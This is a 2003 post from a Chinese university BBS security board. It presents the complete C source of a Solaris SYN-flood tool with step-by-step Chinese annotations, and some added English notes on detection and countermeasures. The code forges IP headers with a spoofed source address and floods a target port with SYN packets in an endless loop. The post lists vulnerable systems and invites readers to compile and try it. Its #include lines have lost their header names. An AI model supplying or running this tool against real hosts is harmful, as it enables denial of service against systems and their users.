

发信人: hellsolaris (qq), 信区: Security
标  题: 一个SYN攻击的代码分析
发信站: 荔园晨风BBS站 (Sat Oct 25 17:53:02 2003), 站内信件

这是一个SYN攻击的源程序:

大家试着读一读,看是否能读懂,不懂可以给我留言。

我加了中文注释。

/* Syn Attack against a port for Solaris */

/* Original land attack, land.c by m3lt, FLC */

/* Ported to 44BSD by blast and jerm */

/* Ported to Solaris by ziro antagonist */

/* Referenced flood.c by unknown author */

/* Converted into a syn attack against one port by CRG */

/* Please use this for educational purposes only */

/* Compiles on Solaris gcc -o synsol synsol.c -lsocket -lnsl */

/* Additional notes: */

/* Successfully compiled on Solaris 2.51 and 2.6 */

/* Runs: synsol    */

/* */

/* Tested it on: Solaris 2.6 */

/* */

/* Attacked against: */

/* Linux 2.0.33 - vulnerable */

/* Linux 2.0.30 - vulnerable */

/* Linux 1.2.13 - vulnerable */

/* Solaris 2.4 - vulnerable */

/* Solaris 2.5.1 - vulnerable */

/* SunOS 4.1.3_U3 - vulnerable */

/* Solaris 2.6 - not vulnerable */

/* */

/* Most of these test machines are not patched because they */

/* are in test lab. I tested the program against port 23 and */

/* every once in awhile I did get through. */

/* */

/* Direct any comments, questions, improvements to */

/* packetstorm@genocide2600.com */

/* http://www.genocide2600.com/~tattooman/ */

/* Your emails will be forwarded to the author, who wishes */

/* to remain known only as CRG (no email addy or URL) */

/*jjgirl:上面的注释的不用说了!*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

/*jjgirl:上面是头文件!*/



/* TCP source port used for the next packet. File-scope object, so it starts
   at 0; main() assigns a new value on every loop iteration. */
unsigned long srcport;



/*
 * TCP pseudo-header followed by a copy of the TCP header.
 *
 * This structure is never put on the wire. main() fills it in and hands it
 * to checksum() so that the TCP checksum also covers the IP source and
 * destination addresses, the protocol number and the TCP length.
 * The fields ahead of tcpheader add up to 4+4+1+1+2 = 12 bytes, which is the
 * literal 12 used in main() (assumes the compiler inserts no padding).
 */
struct pseudohdr

{

struct in_addr saddr;    /* IPv4 source address, same value as ip_src */

struct in_addr daddr;    /* IPv4 destination address, same value as ip_dst */

u_char zero;             /* reserved byte, left at 0 by the bzero() in main() */

u_char protocol;         /* IP protocol number; main() stores 6 (TCP) */

u_short length;          /* TCP segment length, stored in network byte order */

struct tcphdr tcpheader; /* copy of the TCP header with th_sum still 0 */

};

/*jjgirl:定义TCP伪首部(pseudo header)结构!它只用来计算TCP校验和,本身不会被发送出去。*/



/*
 * 16-bit one's-complement Internet checksum (the algorithm used by the IP
 * and TCP headers; it is not a CRC).
 *
 * data   - start of the buffer, read as 16-bit words in native byte order
 * length - number of bytes to cover
 *
 * Returns the complemented, carry-folded sum as stored in a header's
 * checksum field. A buffer that already contains a correct checksum
 * therefore sums to 0.
 */
u_short checksum(u_short * data,u_short length)
{
    const unsigned short *cursor = data;
    int remaining;
    int acc = 0;
    unsigned short result = 0;

    /* Add up every complete 16-bit word. */
    for (remaining = length; remaining > 1; remaining -= 2)
        acc += *cursor++;

    /* An odd trailing byte goes into the first byte (in memory) of a
       zeroed 16-bit word and is added like any other word. */
    if (remaining == 1) {
        *(unsigned char *)&result = *(const unsigned char *)cursor;
        acc += result;
    }

    /* Fold the carries above bit 15 back into the low 16 bits, twice,
       then take the one's complement. */
    acc = (acc & 0xffff) + (acc >> 16);
    acc += acc >> 16;
    result = (unsigned short)~acc;

    return result;
}

/*jjgirl:上面是校验和函数!包头是需要校验的,这里算的是16位反码求和的Internet校验和,不是CRC!*/





/*
 * Entry point of the SYN-flood demonstration.
 *
 * Builds an IPv4 header plus a TCP header with only the SYN flag set and
 * sends that packet to one destination port, over and over, through a raw
 * socket. As used by the code below: argv[1] is the destination host,
 * argv[2] the destination port, argv[3] the address copied into the IP
 * source field. Returns -1 on a usage, lookup, socket or send error.
 *
 * Defender's view: the destination answers every SYN with a SYN-ACK sent to
 * the argv[3] address. That host never asked for the connection, so the
 * handshake is not completed and the half-open entry occupies the listener's
 * queue until it times out. SYN cookies on the listener and source-address
 * validation at the sending network's edge (BCP 38 / RFC 2827) are the
 * standard countermeasures.
 */
int main(int argc,char * * argv)

{/*jjgirl: the main program starts here. */

struct sockaddr_in sin; /* destination: address from argv[1], port from argv[2] */

struct sockaddr_in din; /* only sin_addr is used: the source address from argv[3] */

struct hostent * hoste; /* lookup result for the destination host */

struct hostent * host1; /* lookup result for the source host */

int j,sock,foo, flooddot=1;

char buffer[40]; /* packet buffer; presumably sizeof(struct ip)+sizeof(struct tcphdr) == 40 */

struct ip * ipheader=(struct ip *) buffer;

struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip));

struct pseudohdr pseudoheader; /* scratch copy used only for the TCP checksum */

/*jjgirl: the variables are declared above. */



fprintf(stderr,"Syn attack against one port.(Infinite)\n");



if(argc<4)

{

fprintf(stderr,"usage: %s   \n",argv[0]);

return(-1);

}

/*jjgirl: the argument count is checked above. */

fprintf(stderr,"%s:%s is being syn'd attacked by %s.\n",argv[1],argv[2]
,argv[3]);
bzero(&sin,sizeof(struct sockaddr_in)); /* zero all of sin before filling it in */
sin.sin_family=AF_INET;

/* Source address: try a name lookup first, then fall back to dotted-quad
   parsing. inet_addr() reports failure as all ones, hence the -1 compare. */
if((host1=gethostbyname(argv[3]))!=NULL)

bcopy(host1->h_addr,&din.sin_addr,host1->h_length);

else if((din.sin_addr.s_addr=inet_addr(argv[3]))==-1)

{

fprintf(stderr,"unknown source host %s\n",argv[3]);

return(-1);

}

/* Destination address: same two-step resolution as for the source. */
if((hoste=gethostbyname(argv[1]))!=NULL)

bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);

else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)

{

fprintf(stderr,"unknown destination host %s\n",argv[1]);

return(-1);

}



/* atoi() yields 0 for non-numeric text, so port 0 doubles as the error case. */
if((sin.sin_port=htons(atoi(argv[2])))==0)

{

fprintf(stderr,"unknown port %s\n",argv[2]);

return(-1);

}

/*jjgirl: the sockaddr_in structure is filled in above; it needs the
  address family and the port number. */







/* Raw socket; 255 is IPPROTO_RAW on common BSD-derived stacks. Opening one
   normally requires elevated privileges, which limits who can run this. */
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)

{

fprintf(stderr,"couldn't allocate raw socket\n");

return(-1);

}

/*jjgirl: the socket is created above. */



foo=1;

/* IP_HDRINCL (level 0 = IP): the program supplies the IP header itself.
   This is why the source address field can hold whatever argv[3] gave, and
   why filtering packets whose source does not belong to the sending network
   is an effective control. */
if(setsockopt(sock,0,IP_HDRINCL,(char *)&foo,sizeof(int))==-1)

{

fprintf(stderr,"couldn't set raw header on socket\n");

return(-1);

}

/*jjgirl: the option above lets the program build the header itself. */



/* j only counts iterations; the loop is meant to run forever (leaving it
   through j>0 would need a signed int to wrap, which is undefined). */
for(j=1;j>0;j++)

{

bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr));

ipheader->ip_v=4;

ipheader->ip_tos=0;

ipheader->ip_hl=sizeof(struct ip)/4;

ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr);

ipheader->ip_id=htons(random());

ipheader->ip_ttl=30; /*255;*/

ipheader->ip_p=IPPROTO_TCP;

ipheader->ip_sum=0;

ipheader->ip_src=din.sin_addr;

ipheader->ip_dst=sin.sin_addr;



/* Detection note: every packet carries the same sequence number
   (0x28374839), the same window (2048), a data offset of
   sizeof(struct tcphdr)/4 (header only, no TCP options) and TTL 30.
   Those constants can be matched by a detection rule; ip_id and the
   source port are the fields that change per packet. */
tcpheader->th_sport=htons(srcport); /*sin.sin_port;*/

tcpheader->th_dport=sin.sin_port;

tcpheader->th_seq=htonl(0x28374839);

tcpheader->th_flags=TH_SYN;

tcpheader->th_off=sizeof(struct tcphdr)/4;

tcpheader->th_win=htons(2048);

tcpheader->th_sum=0;



/* 12 = size of the pseudo-header fields that precede tcpheader. */
bzero(&pseudoheader,12+sizeof(struct tcphdr));

pseudoheader.saddr.s_addr=din.sin_addr.s_addr;

pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;

pseudoheader.protocol=6; /* 6 = TCP */

pseudoheader.length=htons(sizeof(struct tcphdr));

bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct
 tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct
 tcphdr));

/*jjgirl: the headers are built above. */



/* Chooses the source port for the NEXT packet; the packet in buffer was
   already built with the previous value (0 on the first iteration). */
srcport= (10000.0*random()/(15000+1.0));

/*jjgirl: the port has to change, of course. */



if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct
 sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
/*jjgirl: this is where the packets start going out. */

{

fprintf(stderr,"couldn't send packet,%d\n",errno);

return(-1);

}

usleep(2); /* pause of 2 microseconds between packets */

/* (flooddot+1)%(1) is always 0, so one dot is printed per packet. */
if (!(flooddot = (flooddot+1)%(1)))

{fprintf(stdout,".");fflush(stdout);}



/*jjgirl: progress display. jjgirl suggests replacing the statement above
  with the two below for a nicer display, if you like:

{fprintf(stdout,".%4d",j);fflush(stdout);}

int k=j; if((k%10)==0) printf("\n"); */



} /*The end of the infinite loop*/

close(sock); /* reached only if the loop ever ends */

return(0);

}

/*jjgirl:结束!编译试试吧!如果有看不懂可以给我留言,或来信jjgirl@263.net,或复
  习前面的课程!*/
/*jjgirl:若有人引用本文,请事先通知,并请保持完整性!*/

--
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.44.223]

